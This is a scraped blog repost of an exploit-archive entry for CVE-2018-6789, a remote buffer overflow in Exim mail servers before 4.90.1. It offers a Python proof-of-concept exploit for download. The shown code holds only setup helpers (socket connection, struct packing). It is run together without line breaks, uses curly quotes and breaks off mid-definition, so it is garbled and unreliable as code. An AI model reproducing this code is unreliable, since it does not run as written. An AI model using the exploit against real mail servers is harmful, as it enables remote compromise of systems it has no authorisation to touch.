Exim base64d Buffer Overflow

[ad_1]

Exim versions prior to 4.90.1 remote buffer overflow proof of concept exploit. MD5 | 6468b402efc15ca33e2db61638ca5cb9 Download #!/usr/bin/pythonimport sysimport timeimport socketimport structs = Nonef = Nonedef logo(): print print ” CVE-2018-6789 Poc Exploit” print “@straight_blast ; [email protected]” printdef connect(host, port): global s global f s = socket.create_connection((host,port)) f = s.makefile(‘rw’, bufsize=0)def p(v): return struct.pack(“def readuntil(delim=’n’, debug […]

The post Exim base64d Buffer Overflow appeared first on Geekychild.

[ad_2]

Source link